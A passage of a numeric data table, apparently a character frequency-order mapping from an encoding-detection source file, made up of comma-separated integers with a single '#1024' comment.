1549,2857,2858,2859,2860,1550,2861,2862,1551,2863,2864,2865,2866,2867,2868,2869,
2870,2871,2872,2873,2874,1110,1330,2875,2876,2877,2878,2879,2880,2881,2882,2883,
2884,2885,2886,2887,2888,2889,2890,2891,2892,2893,2894,2895,2896,2897,2898,2899,
2900,2901,2902,2903,2904,2905,2906,2907,2908,2909,2910,2911,2912,2913,2914,2915,
2916,2917,2918,2919,2920,2921,2922,2923,2924,2925,2926,2927,2928,2929,2930,1331,
2931,2932,2933,2934,2935,2936,2937,2938,2939,2940,2941,2942,2943,1552,2944,2945,
2946,2947,2948,2949,2950,2951,2952,2953,2954,2955,2956,2957,2958,2959,2960,2961,
2962,2963,2964,1252,2965,2966,2967,2968,2969,2970,2971,2972,2973,2974,2975,2976,
2977,2978,2979,2980,2981,2982,2983,2984,2985,2986,2987,2988,2989,2990,2991,2992,
2993,2994,2995,2996,2997,2998,2999,3000,3001,3002,3003,3004,3005,3006,3007,3008,
3009,3010,3011,3012,1553,3013,3014,3015,3016,3017,1554,3018,1332,3019,3020,3021,
3022,3023,3024,3025,3026,3027,3028,3029,3030,3031,3032,3033,3034,3035,3036,3037,
3038,3039,3040,3041,3042,3043,3044,3045,3046,3047,3048,3049,3050,1555,3051,3052,
3053,1556,1557,3054,3055,3056,3057,3058,3059,3060,3061,3062,3063,3064,3065,3066,
3067,1558,3068,3069,3070,3071,3072,3073,3074,3075,3076,1559,3077,3078,3079,3080,
3081,3082,3083,1253,3084,3085,3086,3087,3088,3089,3090,3091,3092,3093,3094,3095,
3096,3097,3098,3099,3100,3101,3102,3103,3104,3105,3106,3107,3108,1152,3109,3110,
3111,3112,3113,1560,3114,3115,3116,3117,1111,3118,3119,3120,3121,3122,3123,3124,
3125,3126,3127,3128,3129,3130,3131,3132,3133,3134,3135,3136,3137,3138,3139,3140,
3141,3142,3143,3144,3145,3146,3147,3148,3149,3150,3151,3152,3153,3154,3155,3156,
3157,3158,3159,3160,3161,3162,3163,3164,3165,3166,3167,3168,3169,3170,3171,3172,
3173,3174,3175,3176,1333,3177,3178,3179,3180,3181,3182,3183,3184,3185,3186,3187,
3188,3189,1561,3190,3191,1334,3192,3193,3194,3195,3196,3197,3198,3199,3200,3201,
3202,3203,3204,3205,3206,3207,3208,3209,3210,3211,3212,3213,3214,3215,3216,3217,
3218,3219,3220,3221,3222,3223,3224,3225,3226,3227,3228,3229,3230,3231,3232,3233,
3234,1562,3235,3236,3237,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248,
3249,3250,3251,3252,3253,3254,3255,3256,3257,3258,3259,3260,3261,3262,3263,3264,
3265,3266,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,1563,3278,3279,
3280,3281,3282,3283,3284,3285,3286,3287,3288,3289,3290,3291,3292,3293,3294,3295,
3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,
3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,
3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,
3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,
3360,3361,3362,3363,3364,1335,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,
3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,1336,3388,3389,
3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,
3406,3407,3408,3409,3410,3411,3412,3413,3414,1337,3415,3416,3417,3418,3419,1338,
3420,3421,3422,1564,1565,3423,3424,3425,3426,3427,3428,3429,3430,3431,1254,3432,
3433,3434,1339,3435,3436,3437,3438,3439,1566,3440,3441,3442,3443,3444,3445,3446,
3447,3448,3449,3450,3451,3452,3453,3454,1255,3455,3456,3457,3458,3459,1567,1191,
3460,1568,1569,3461,3462,3463,1570,3464,3465,3466,3467,3468,1571,3469,3470,3471,
3472,3473,1572,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,
1340,3487,3488,3489,3490,3491,3492,1021,3493,3494,3495,3496,3497,3498,1573,3499,
1341,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510,3511,1342,3512,3513,
3514,3515,3516,1574,1343,3517,3518,3519,1575,3520,1576,3521,3522,3523,3524,3525,
3526,3527,3528,3529,3530,3531,3532,3533,3534,3535,3536,3537,3538,3539,3540,3541,
3542,3543,3544,3545,3546,3547,3548,3549,3550,3551,3552,3553,3554,3555,3556,3557,
3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3568,3569,3570,3571,3572,3573,
3574,3575,3576,3577,3578,3579,3580,1577,3581,3582,1578,3583,3584,3585,3586,3587,
3588,3589,3590,3591,3592,3593,3594,3595,3596,3597,3598,3599,3600,3601,3602,3603,
3604,1579,3605,3606,3607,3608,3609,3610,3611,3612,3613,3614,3615,3616,3617,3618,
3619,3620,3621,3622,3623,3624,3625,3626,3627,3628,3629,1580,3630,3631,1581,3632,
3633,3634,3635,3636,3637,3638,3639,3640,3641,3642,3643,3644,3645,3646,3647,3648,
3649,3650,3651,3652,3653,3654,3655,3656,1582,3657,3658,3659,3660,3661,3662,3663,
3664,3665,3666,3667,3668,3669,3670,3671,3672,3673,3674,3675,3676,3677,3678,3679,
3680,3681,3682,3683,3684,3685,3686,3687,3688,3689,3690,3691,3692,3693,3694,3695,
3696,3697,3698,3699,3700,1192,3701,3702,3703,3704,1256,3705,3706,3707,3708,1583,
1257,3709,3710,3711,3712,3713,3714,3715,3716,1584,3717,3718,3719,3720,3721,3722,
3723,3724,3725,3726,3727,3728,3729,3730,3731,3732,3733,3734,3735,3736,3737,3738,
3739,3740,3741,3742,3743,3744,3745,1344,3746,3747,3748,3749,3750,3751,3752,3753,
3754,3755,3756,1585,3757,3758,3759,3760,3761,3762,3763,3764,3765,3766,1586,3767,
3768,3769,3770,3771,3772,3773,3774,3775,3776,3777,3778,1345,3779,3780,3781,3782,
3783,3784,3785,3786,3787,3788,3789,3790,3791,3792,3793,3794,3795,1346,1587,3796,
3797,1588,3798,3799,3800,3801,3802,3803,3804,3805,3806,1347,3807,3808,3809,3810,
3811,1589,3812,3813,3814,3815,3816,3817,3818,3819,3820,3821,1590,3822,3823,1591,
1348,3824,3825,3826,3827,3828,3829,3830,1592,3831,3832,1593,3833,3834,3835,3836,
3837,3838,3839,3840,3841,3842,3843,3844,1349,3845,3846,3847,3848,3849,3850,3851,
3852,3853,3854,3855,3856,3857,3858,1594,3859,3860,3861,3862,3863,3864,3865,3866,
3867,3868,3869,1595,3870,3871,3872,3873,1596,3874,3875,3876,3877,3878,3879,3880,
3881,3882,3883,3884,3885,3886,1597,3887,3888,3889,3890,3891,3892,3893,3894,3895,
1598,3896,3897,3898,1599,1600,3899,1350,3900,1351,3901,3902,1352,3903,3904,3905,
3906,3907,3908,3909,3910,3911,3912,3913,3914,3915,3916,3917,3918,3919,3920,3921,
3922,3923,3924,1258,3925,3926,3927,3928,3929,3930,3931,1193,3932,1601,3933,3934,
3935,3936,3937,3938,3939,3940,3941,3942,3943,1602,3944,3945,3946,3947,3948,1603,
3949,3950,3951,3952,3953,3954,3955,3956,3957,3958,3959,3960,3961,3962,3963,3964,
3965,1604,3966,3967,3968,3969,3970,3971,3972,3973,3974,3975,3976,3977,1353,3978,
3979,3980,3981,3982,3983,3984,3985,3986,3987,3988,3989,3990,3991,1354,3992,3993,
3994,3995,3996,3997,3998,3999,4000,4001,4002,4003,4004,4005,4006,4007,4008,4009,
4010,4011,4012,4013,4014,4015,4016,4017,4018,4019,4020,4021,4022,4023,1355,4024,
4025,4026,4027,4028,4029,4030,4031,4032,4033,4034,4035,4036,4037,4038,4039,4040,
1605,4041,4042,4043,4044,4045,4046,4047,4048,4049,4050,4051,4052,4053,4054,4055,
4056,4057,4058,4059,4060,1606,4061,4062,4063,4064,1607,4065,4066,4067,4068,4069,
4070,4071,4072,4073,4074,4075,4076,1194,4077,4078,1608,4079,4080,4081,4082,4083,
4084,4085,4086,4087,1609,4088,4089,4090,4091,4092,4093,4094,4095,4096,4097,4098,
4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,1259,4109,4110,4111,4112,4113,
4114,4115,4116,4117,4118,4119,4120,4121,4122,4123,4124,1195,4125,4126,4127,1610,
4128,4129,4130,4131,4132,4133,4134,4135,4136,4137,1356,4138,4139,4140,4141,4142,
4143,4144,1611,4145,4146,4147,4148,4149,4150,4151,4152,4153,4154,4155,4156,4157,
4158,4159,4160,4161,4162,4163,4164,4165,4166,4167,4168,4169,4170,4171,4172,4173,
4174,4175,4176,4177,4178,4179,4180,4181,4182,4183,4184,4185,4186,4187,4188,4189,
4190,4191,4192,4193,4194,4195,4196,4197,4198,4199,4200,4201,4202,4203,4204,4205,
4206,4207,4208,4209,4210,4211,4212,4213,4214,4215,4216,4217,4218,4219,1612,4220,
4221,4222,4223,4224,4225,4226,4227,1357,4228,1613,4229,4230,4231,4232,4233,4234,
4235,4236,4237,4238,4239,4240,4241,4242,4243,1614,4244,4245,4246,4247,4248,4249,
4250,4251,4252,4253,4254,4255,4256,4257,4258,4259,4260,4261,4262,4263,4264,4265,
4266,4267,4268,4269,4270,1196,1358,4271,4272,4273,4274,4275,4276,4277,4278,4279,
4280,4281,4282,4283,4284,4285,4286,4287,1615,4288,4289,4290,4291,4292,4293,4294,
4295,4296,4297,4298,4299,4300,4301,4302,4303,4304,4305,4306,4307,4308,4309,4310,
4311,4312,4313,4314,4315,4316,4317,4318,4319,4320,4321,4322,4323,4324,4325,4326,
4327,4328,4329,4330,4331,4332,4333,4334,1616,4335,4336,4337,4338,4339,4340,4341,
4342,4343,4344,4345,4346,4347,4348,4349,4350,4351,4352,4353,4354,4355,4356,4357,
4358,4359,4360,1617,4361,4362,4363,4364,4365,1618,4366,4367,4368,4369,4370,4371,
4372,4373,4374,4375,4376,4377,4378,4379,4380,4381,4382,4383,4384,4385,4386,4387,
4388,4389,4390,4391,4392,4393,4394,4395,4396,4397,4398,4399,4400,4401,4402,4403,
4404,4405,4406,4407,4408,4409,4410,4411,4412,4413,4414,4415,4416,1619,4417,4418,
4419,4420,4421,4422,4423,4424,4425,1112,4426,4427,4428,4429,4430,1620,4431,4432,
4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,1260,1261,4443,4444,4445,4446,
4447,4448,4449,4450,4451,4452,4453,4454,4455,1359,4456,4457,4458,4459,4460,4461,
4462,4463,4464,4465,1621,4466,4467,4468,4469,4470,4471,4472,4473,4474,4475,4476,
4477,4478,4479,4480,4481,4482,4483,4484,4485,4486,4487,4488,4489,1055,4490,4491,
4492,4493,4494,4495,4496,4497,4498,4499,4500,4501,4502,4503,4504,4505,4506,4507,
4508,4509,4510,4511,4512,4513,4514,4515,4516,4517,4518,1622,4519,4520,4521,1623,
4522,4523,4524,4525,4526,4527,4528,4529,4530,4531,4532,4533,4534,4535,1360,4536,
4537,4538,4539,4540,4541,4542,4543, 975,4544,4545,4546,4547,4548,4549,4550,4551,
4552,4553,4554,4555,4556,4557,4558,4559,4560,4561,4562,4563,4564,4565,4566,4567,
4568,4569,4570,4571,1624,4572,4573,4574,4575,4576,1625,4577,4578,4579,4580,4581,
4582,4583,4584,1626,4585,4586,4587,4588,4589,4590,4591,4592,4593,4594,4595,1627,
4596,4597,4598,4599,4600,4601,4602,4603,4604,4605,4606,4607,4608,4609,4610,4611,
4612,4613,4614,4615,1628,4616,4617,4618,4619,4620,4621,4622,4623,4624,4625,4626,
4627,4628,4629,4630,4631,4632,4633,4634,4635,4636,4637,4638,4639,4640,4641,4642,
4643,4644,4645,4646,4647,4648,4649,1361,4650,4651,4652,4653,4654,4655,4656,4657,
4658,4659,4660,4661,1362,4662,4663,4664,4665,4666,4667,4668,4669,4670,4671,4672,
4673,4674,4675,4676,4677,4678,4679,4680,4681,4682,1629,4683,4684,4685,4686,4687,
1630,4688,4689,4690,4691,1153,4692,4693,4694,1113,4695,4696,4697,4698,4699,4700,
4701,4702,4703,4704,4705,4706,4707,4708,4709,4710,4711,1197,4712,4713,4714,4715,
4716,4717,4718,4719,4720,4721,4722,4723,4724,4725,4726,4727,4728,4729,4730,4731,
4732,4733,4734,4735,1631,4736,1632,4737,4738,4739,4740,4741,4742,4743,4744,1633,
4745,4746,4747,4748,4749,1262,4750,4751,4752,4753,4754,1363,4755,4756,4757,4758,
4759,4760,4761,4762,4763,4764,4765,4766,4767,4768,1634,4769,4770,4771,4772,4773,
4774,4775,4776,4777,4778,1635,4779,4780,4781,4782,4783,4784,4785,4786,4787,4788,
4789,1636,4790,4791,4792,4793,4794,4795,4796,4797,4798,4799,4800,4801,4802,4803,
4804,4805,4806,1637,4807,4808,4809,1638,4810,4811,4812,4813,4814,4815,4816,4817,
4818,1639,4819,4820,4821,4822,4823,4824,4825,4826,4827,4828,4829,4830,4831,4832,
4833,1077,4834,4835,4836,4837,4838,4839,4840,4841,4842,4843,4844,4845,4846,4847,
4848,4849,4850,4851,4852,4853,4854,4855,4856,4857,4858,4859,4860,4861,4862,4863,
4864,4865,4866,4867,4868,4869,4870,4871,4872,4873,4874,4875,4876,4877,4878,4879,
4880,4881,4882,4883,1640,4884,4885,1641,4886,4887,4888,4889,4890,4891,4892,4893,
4894,4895,4896,4897,4898,4899,4900,4901,4902,4903,4904,4905,4906,4907,4908,4909,
4910,4911,1642,4912,4913,4914,1364,4915,4916,4917,4918,4919,4920,4921,4922,4923,
4924,4925,4926,4927,4928,4929,4930,4931,1643,4932,4933,4934,4935,4936,4937,4938,
4939,4940,4941,4942,4943,4944,4945,4946,4947,4948,4949,4950,4951,4952,4953,4954,
4955,4956,4957,4958,4959,4960,4961,4962,4963,4964,4965,4966,4967,4968,4969,4970,
4971,4972,4973,4974,4975,4976,4977,4978,4979,4980,1644,4981,4982,4983,4984,1645,
4985,4986,1646,4987,4988,4989,4990,4991,4992,4993,4994,4995,4996,4997,4998,4999,
5000,5001,5002,5003,5004,5005,1647,5006,1648,5007,5008,5009,5010,5011,5012,1078,
5013,5014,5015,5016,5017,5018,5019,5020,5021,5022,5023,5024,5025,5026,5027,5028,
1365,5029,5030,5031,5032,5033,5034,5035,5036,5037,5038,5039,1649,5040,5041,5042,
5043,5044,5045,1366,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,1650,5056,
5057,5058,5059,5060,5061,5062,5063,5064,5065,5066,5067,5068,5069,5070,5071,5072,
5073,5074,5075,5076,5077,1651,5078,5079,5080,5081,5082,5083,5084,5085,5086,5087,
5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102,5103,
5104,5105,5106,5107,5108,5109,5110,1652,5111,5112,5113,5114,5115,5116,5117,5118,
1367,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,1653,5130,5131,5132,
5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,
5149,1368,5150,1654,5151,1369,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161,
5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177,
5178,1370,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192,
5193,5194,5195,5196,5197,5198,1655,5199,5200,5201,5202,1656,5203,5204,5205,5206,
1371,5207,1372,5208,5209,5210,5211,1373,5212,5213,1374,5214,5215,5216,5217,5218,
5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,
5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,1657,5248,5249,
5250,5251,1658,1263,5252,5253,5254,5255,5256,1375,5257,5258,5259,5260,5261,5262,
5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,
5279,5280,5281,5282,5283,1659,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,
5294,5295,5296,5297,5298,5299,5300,1660,5301,5302,5303,5304,5305,5306,5307,5308,
5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,1376,5322,5323,
5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,1198,5334,5335,5336,5337,5338,
5339,5340,5341,5342,5343,1661,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353,
5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369,
5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385,
5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,1264,5399,5400,
5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,1662,5413,5414,5415,
5416,1663,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430,
5431,5432,5433,5434,5435,5436,5437,5438,1664,5439,5440,5441,5442,5443,5444,5445,
5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461,
5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477,
5478,1154,5479,5480,5481,5482,5483,5484,5485,1665,5486,5487,5488,5489,5490,5491,
5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507,
5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523,
5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539,
5540,5541,5542,5543,5544,5545,5546,5547,5548,1377,5549,5550,5551,5552,5553,5554,
5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570,
1114,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585,
5586,5587,5588,5589,5590,5591,5592,1378,5593,5594,5595,5596,5597,5598,5599,5600,
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,1379,5615,
5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,
5632,5633,5634,1380,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,
5647,5648,5649,1381,1056,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,
1666,5661,5662,5663,5664,5665,5666,5667,5668,1667,5669,1668,5670,5671,5672,5673,
5674,5675,5676,5677,5678,1155,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688,
5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,1669,5699,5700,5701,5702,5703,
5704,5705,1670,5706,5707,5708,5709,5710,1671,5711,5712,5713,5714,1382,5715,5716,
5717,5718,5719,5720,5721,5722,5723,5724,5725,1672,5726,5727,1673,1674,5728,5729,
5730,5731,5732,5733,5734,5735,5736,1675,5737,5738,5739,5740,5741,5742,5743,5744,
1676,5745,5746,5747,5748,5749,5750,5751,1383,5752,5753,5754,5755,5756,5757,5758,
5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,1677,5769,5770,5771,5772,5773,
1678,5774,5775,5776, 998,5777,5778,5779,5780,5781,5782,5783,5784,5785,1384,5786,
5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,1679,5801,
5802,5803,1115,1116,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815,
5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831,
5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847,
5848,5849,5850,5851,5852,5853,5854,5855,1680,5856,5857,5858,5859,5860,5861,5862,
5863,5864,1681,5865,5866,5867,1682,5868,5869,5870,5871,5872,5873,5874,5875,5876,
5877,5878,5879,1683,5880,1684,5881,5882,5883,5884,1685,5885,5886,5887,5888,5889,
5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,
5906,5907,1686,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,1687,
5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,
5952,1688,1689,5953,1199,5954,5955,5956,5957,5958,5959,5960,5961,1690,5962,5963,
5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,
5980,5981,1385,5982,1386,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993,
5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6008,6009,
6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020,6021,6022,6023,6024,6025,
6026,6027,1265,6028,6029,1691,6030,6031,6032,6033,6034,6035,6036,6037,6038,6039,
6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052,6053,6054,6055,
6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068,6069,6070,6071,
6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084,1692,6085,6086,
6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100,6101,6102,
6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116,6117,6118,
6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,1693,6132,6133,
6134,6135,6136,1694,6137,6138,6139,6140,6141,1695,6142,6143,6144,6145,6146,6147,
6148,6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,
6164,6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,
6180,6181,6182,6183,6184,6185,1696,6186,6187,6188,6189,6190,6191,6192,6193,6194,
6195,6196,6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,
6211,6212,6213,6214,6215,6216,6217,6218,6219,1697,6220,6221,6222,6223,6224,6225,
6226,6227,6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,
6242,6243,6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,1698,6254,6255,6256,
6257,6258,6259,6260,6261,6262,6263,1200,6264,6265,6266,6267,6268,6269,6270,6271, #1024
6272,6273,6274,6275,6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,6286,6287,
6288,6289,6290,6291,6292,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,1699,
6303,6304,1700,6305,6306,6307,6308,6309,6310,6311,6312,6313,6314,6315,6316,6317,
6318,6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,
6334,6335,6336,6337,6338,6339,1701,6340,6341,6342,6343,6344,1387,6345,6346,6347,
6348,6349,6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,
6364,6365,6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,
6380,6381,6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,
6396,6397,6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,6411,
6412,6413,1702,6414,6415,6416,6417,6418,6419,6420,6421,6422,1703,6423,6424,6425,
6426,6427,6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,1704,6439,6440,
6441,6442,6443,6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,6455,6456,
6457,6458,6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,
6473,6474,6475,6476,6477,6478,6479,6480,6481,6482,6483,6484,6485,6486,6487,6488,
6489,6490,6491,6492,6493,6494,6495,6496,6497,6498,6499,6500,6501,6502,6503,1266,
6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,
6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532,6533,6534,6535,
6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548,6549,6550,6551,
1705,1706,6552,6553,6554,6555,6556,6557,6558,6559,6560,6561,6562,6563,6564,6565,
6566,6567,6568,6569,6570,6571,6572,6573,6574,6575,6576,6577,6578,6579,6580,6581,
6582,6583,6584,6585,6586,6587,6588,6589,6590,6591,6592,6593,6594,6595,6596,6597,
6598,6599,6600,6601,6602,6603,6604,6605,6606,6607,6608,6609,6610,6611,6612,6613,
6614,6615,6616,6617,6618,6619,6620,6621,6622,6623,6624,6625,6626,6627,6628,6629,
6630,6631,6632,6633,6634,6635,6636,6637,1388,6638,6639,6640,6641,6642,6643,6644,
1707,6645,6646,6647,6648,6649,6650,6651,6652,6653,6654,6655,6656,6657,6658,6659,
6660,6661,6662,6663,1708,6664,6665,6666,6667,6668,6669,6670,6671,6672,6673,6674,
1201,6675,6676,6677,6678,6679,6680,6681,6682,6683,6684,6685,6686,6687,6688,6689,
6690,6691,6692,6693,6694,6695,6696,6697,6698,6699,6700,6701,6702,6703,6704,6705,
6706,6707,6708,6709,6710,6711,6712,6713,6714,6715,6716,6717,6718,6719,6720,6721,
6722,6723,6724,6725,1389,6726,6727,6728,6729,6730,6731,6732,6733,6734,6735,6736,
1390,1709,6737,6738,6739,6740,6741,6742,1710,6743,6744,6745,6746,1391,6747,6748,
6749,6750,6751,6752,6753,6754,6755,6756,6757,1392,6758,6759,6760,6761,6762,6763,
6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777,6778,6779,
6780,1202,6781,6782,6783,6784,6785,6786,6787,6788,6789,6790,6791,6792,6793,6794,
6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806,6807,6808,6809,1711,
6810,6811,6812,6813,6814,6815,6816,6817,6818,6819,6820,6821,6822,6823,6824,6825,
6826,6827,6828,6829,6830,6831,6832,6833,6834,6835,6836,1393,6837,6838,6839,6840,
6841,6842,6843,6844,6845,6846,6847,6848,6849,6850,6851,6852,6853,6854,6855,6856,
6857,6858,6859,6860,6861,6862,6863,6864,6865,6866,6867,6868,6869,6870,6871,6872,
6873,6874,6875,6876,6877,6878,6879,6880,6881,6882,6883,6884,6885,6886,6887,6888,
6889,6890,6891,6892,6893,6894,6895,6896,6897,6898,6899,6900,6901,6902,1712,6903,
6904,6905,6906,6907,6908,6909,6910,1713,6911,6912,6913,6914,6915,6916,6917,6918,
6919,6920,6921,6922,6923,6924,6925,6926,6927,6928,6929,6930,6931,6932,6933,6934,
6935,6936,6937,6938,6939,6940,6941,6942,6943,6944,6945,6946,6947,6948,6949,6950,
6951,6952,6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,
6967,6968,6969,6970,6971,6972,6973,6974,1714,6975,6976,6977,6978,6979,6980,6981,
6982,6983,6984,6985,6986,6987,6988,1394,6989,6990,6991,6992,6993,6994,6995,6996,
6997,6998,6999,7000,1715,7001,7002,7003,7004,7005,7006,7007,7008,7009,7010,7011,
7012,7013,7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,
7028,1716,7029,7030,7031,7032,7033,7034,7035,7036,7037,7038,7039,7040,7041,7042,
7043,7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,
7059,7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,7071,7072,7073,7074,
7075,7076,7077,7078,7079,7080,7081,7082,7083,7084,7085,7086,7087,7088,7089,7090,
7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105,7106,
7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,7119,7120,7121,7122,
7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136,7137,7138,
7139,7140,7141,7142,7143,7144,7145,7146,7147,7148,7149,7150,7151,7152,7153,7154,
7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167,7168,7169,7170,
7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183,7184,7185,7186,
7187,7188,7189,7190,7191,7192,7193,7194,7195,7196,7197,7198,7199,7200,7201,7202,
7203,7204,7205,7206,7207,1395,7208,7209,7210,7211,7212,7213,1717,7214,7215,7216,
7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229,7230,7231,7232,
7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245,7246,7247,7248,
7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261,7262,7263,7264,
7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277,7278,7279,7280,
7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293,7294,7295,7296,
7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308,7309,7310,7311,7312,
7313,1718,7314,7315,7316,7317,7318,7319,7320,7321,7322,7323,7324,7325,7326,7327,
7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339,7340,7341,7342,7343,
7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,7354,7355,7356,7357,7358,7359,
7360,7361,7362,7363,7364,7365,7366,7367,7368,7369,7370,7371,7372,7373,7374,7375,
7376,7377,7378,7379,7380,7381,7382,7383,7384,7385,7386,7387,7388,7389,7390,7391,
7392,7393,7394,7395,7396,7397,7398,7399,7400,7401,7402,7403,7404,7405,7406,7407,
7408,7409,7410,7411,7412,7413,7414,7415,7416,7417,7418,7419,7420,7421,7422,7423,
7424,7425,7426,7427,7428,7429,7430,7431,7432,7433,7434,7435,7436,7437,7438,7439,
7440,7441,7442,7443,7444,7445,7446,7447,7448,7449,7450,7451,7452,7453,7454,7455,
7456,7457,7458,7459,7460,7461,7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,
